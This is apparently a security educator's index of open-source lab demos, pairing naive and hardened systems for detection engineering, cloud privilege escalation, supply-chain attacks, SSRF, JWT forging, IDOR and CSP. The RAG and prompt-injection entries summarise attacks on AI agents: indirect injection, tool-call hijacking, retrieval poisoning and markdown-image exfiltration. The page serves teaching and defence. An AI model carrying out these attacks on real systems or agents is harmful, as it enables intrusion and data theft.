Labs

Hands-on, opinionated security playgrounds. Each lab pairs a working demo with the failure modes I've actually seen in production. Built because the topics here don't survive PowerPoint.

Livenew

Detection Engineering

Real Sysmon, CloudTrail, and Entra sign-in telemetry from real incidents (Midnight Blizzard 2024, Volt Typhoon, Storm-0558), ground-truth labeled, with a naive and a tuned Sigma-style rule for each. Edit either rule's match tree as JSON and watch precision, recall, and F1 update live. Plus one Sigma-equivalent starter rule per lab domain.

Five attack scenarios, ground-truth labeled
Sigma-equivalent match engine (eq/regex/and/or/not)
Live precision / recall / F1 metrics
Per-lab Sigma starter rules (CSP / JWT / SSRF / IAM / …)

Open lab →Livenew

Agent Identity Lab

RFC 8693 token exchange in motion: pick a user, an agent, scopes, a TTL, and watch all three JWTs decoded side-by-side with a claims diff explaining what came from subject_token, what came from actor_token, and what the STS narrowed. Run the eight-rule drift detector against a fixture inventory of seven agents.

RFC 8693 token-exchange playground with claims diff
8-rule drift detector (AGT01–AGT08)
Six attestation surfaces compared
Companion to the Agent Identity Front essay

Open lab →Livenew

IAM Privilege Escalation

A live attack-path enumerator across AWS, Azure, and GCP. Edit a principal directory and watch the engine derive every transition from the {12}-technique catalog (PassRole+RunInstances, UpdateAssumeRolePolicy, Application.ReadWrite.All, iam.serviceAccounts.actAs) and BFS to admin. Modeled on Pacu, CloudGoat, and AzureHound.

12 published privesc techniques across three clouds
Editable principal graph with live path enumeration
Multi-hop chains through groups and roles
Citations to Rhino, SpecterOps, hackingthe.cloud

Open lab →Livenew

Supply Chain Lab

Real registry compromises, replayed against a live provenance analyzer. Replicas of event-stream (2018), ua-parser-js (2021), node-ipc (2022), 3CX (2023), XZ Utils (2024), Ultralytics (2024), LottieFiles (2024), and tj-actions (2025). Seven detection rules covering install hooks, rapid republish, publisher-IP drift, missing build provenance, and known typosquat patterns.

Eight real-incident replicas with citations
7-rule provenance analyzer (PROV01–PROV07)
Ten typosquat patterns drawn from real campaigns
Sigstore / npm-provenance verification flow

Open lab →Livenew

RAG Security Lab

Real attacks against retrieval-augmented generation, replayed with a deterministic in-browser vector store. Indirect prompt injection (Greshake 2023), PoisonedRAG ranking attacks (Zou 2024), markdown image canary exfil, citation forgery, training-data extraction (Carlini 2023). Naive vs four-defense hardened agent side by side.

Six published attacks reproduced with full traces
Spotlighting + URL allowlist + grounding + dedup
Live retrievals with cosine-similarity scores
Four-rule corpus analyzer (RAG01–RAG04)

Open lab →Livenew

Prompt Injection Lab

Indirect prompt injection, tool-call hijacking, exfiltration via markdown images. A deterministic side-by-side simulator of a naive vs hardened agent on identical attacker-crafted documents, now with a five-tool agent loop, 12 scenarios, and exportable telemetry. No LLM API key required.

Live five-tool agent loop, 12 scenarios
10-rule injection detector (PI01–PI10)
Hardened-policy editor with live re-runs
JSON telemetry export

Open lab →Livenew

SSRF / Cloud Metadata

Why 169.254.169.254 is the most-attacked IP on the internet. Live fetcher sandbox replaying 10 payloads (decimal / hex / octal IPv4, IPv6 loopback, DNS rebinding, AWS IMDSv1, GCP-via-Host-smuggle, Redis CRLF, K8s API ServiceAccount, gopher → Redis RCE) through a naive fetcher and a hardened one side-by-side.

Live fetcher sandbox with 10-scenario catalog
Naive vs hardened (H-SCHEME / H-CRLF / H-IPRANGE / …)
Sandboxed /api/ssrf-fetch for curl + SIEM replay
Capital One IMDS, Orange Tsai 2017, OWASP cheat sheet

Open lab →Livenew

Identity Lab

Phishing-resistant authentication, end to end. Register a passkey in your browser, decode real JWTs and see what makes them forgeable, and learn how the same primitives apply to AI agents acting on a user's behalf. Now with a JWT forging workbench against an intentionally-misconfigurable verifier.

WebAuthn / passkey registration + sign-in
JWT inspector + forging workbench (4 CVE-class attacks)
Phishing-resistant MFA explainer
Agent identity (OIDC, SPIFFE, RFC 8693)

Open lab →Live

CSP Playground

Paste a Content-Security-Policy header, watch the analyzer flag the same patterns I flag in client engagements: unsafe-inline, wildcards, missing object-src, no nonce, no report-uri. Then see the four canonical CSP shapes side by side.

Live CSP header analyzer (12 rules)
Four canonical policy shapes compared
Common bypass patterns (JSONP, base-uri, dangling markup)
Migration path from unsafe-inline to nonces

Open lab →Live

AuthZ Lab — IDOR / BOLA

Broken Object Level Authorization is OWASP API Top 10 #1. Pick a user, ask for someone else's order ID, and watch the naive endpoint hand it over while the hardened endpoint returns 404. Eight detection rules covering missing owner scope, 403-vs-404 leakage, sequential IDs, and mass-assignment.

Naive vs hardened endpoint simulator
8-rule pattern catalog (BOLA01–BOLA08)
SARIF/JSON export of the ruleset
Pairs with the AuthN work in Identity Lab

Open lab →

Why labs

Every security finding I've ever written has been more convincing when the reader could touch the bug. Slide decks let people nod along; a working demo, with the actual headers on the actual wire, is what changes architecture decisions.

These labs cost nothing to run, are linkable in a code review, and each one is a complete teaching artifact in under five minutes. If you're an engineer trying to convince a leader, or a leader trying to understand an engineer, that's what they're for.

Source

Everything is open source under MIT. github.com/mdiallo15/identity-lab. Issues and PRs welcome.